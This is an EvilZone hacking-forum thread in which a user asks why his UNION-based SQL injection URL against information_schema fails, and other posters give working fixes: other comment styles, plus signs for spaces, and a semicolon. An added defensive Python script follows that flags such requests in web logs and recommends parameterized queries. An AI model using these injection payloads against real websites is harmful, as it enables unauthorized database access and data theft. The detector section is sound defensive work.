EvilZone
Programming and Scripting => Web Oriented Coding => Topic started by: $Clone on July 19, 2015, 05:35:12 AM
-
Hey there, I am trying to test for SQLi in a website where I have found a table to be vulnerable. The URL is
http://www.example.com/test.php?id=null UNION SELECT 1,group_concat(table_NAME),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database--
I get the error:
invalid query: You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '-' at line 1
I have tried removing the -- but I don't get how?? :-\ It's not working...
-
Have you tried different comment types?
# or /* instead of -- etc.?
-
You need to include ; before the comment. As was mentioned, try using different comment types.
-
^ this and try to include + instead of spaces.
-
Actually, I notice once you get the vulnerable tables you just put
www.example.com/index.php?id=null UNION SELECT 1,table_NAME,3,4,5,6,7,8,9,10 from information_schema.tables-- and it worked fine
-
-- is sufficient for normal integer-based injection
--+-+ / -- - is required upon handling string-based injection
all speaking MySQL>=5
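-
Added example, not part of the thread: the variations discussed above (different comment types, `+` in place of spaces, inline `/**/`) are the same request shapes a defender has to normalize before matching UNION-based injection in web access logs. The sample requests, function names and two-indicator threshold below are constructed assumptions for illustration, not code from any poster.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request targets (not real traffic), shaped like the thread's URLs.
SAMPLE_REQUESTS = [
    "/test.php?id=42",
    "/test.php?id=null UNION SELECT 1,group_concat(table_NAME),3 from information_schema.tables--",
    "/index.php?id=null+UNION+SELECT+1,table_NAME,3+from+information_schema.tables--+-",
    "/test.php?id=1%20UnIoN/**/SeLeCt%201,2,3%23",
    "/search.php?q=student+union+select+committee",   # benign text that contains the keywords
]

INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    # Query ends in a comment opener: --, -- -, # or an unclosed /*
    "trailing_comment": re.compile(r"(?:--|#|/\*)[\s\-]*$"),
}


def normalize(target: str) -> str:
    """Return the decoded, lower-cased query string of a request target."""
    _, _, query = target.partition("?")
    decoded = unquote_plus(query)                       # decodes %20, %23 and '+'
    decoded = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)  # inline /**/ used as a space
    return re.sub(r"\s+", " ", decoded).strip().lower()


def indicators(target: str) -> list[str]:
    """Names of the indicators that match the normalized query string."""
    text = normalize(target)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def is_suspicious(target: str) -> bool:
    # Require two indicators: a lone "union select" also occurs in ordinary text.
    return len(indicators(target)) >= 2


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(is_suspicious(req), indicators(req), req)
```

Pattern matching like this only supports alerting and triage; the fix on the application side is to bind `id` as a parameter (or cast it to an integer) so none of these variants reach the SQL parser.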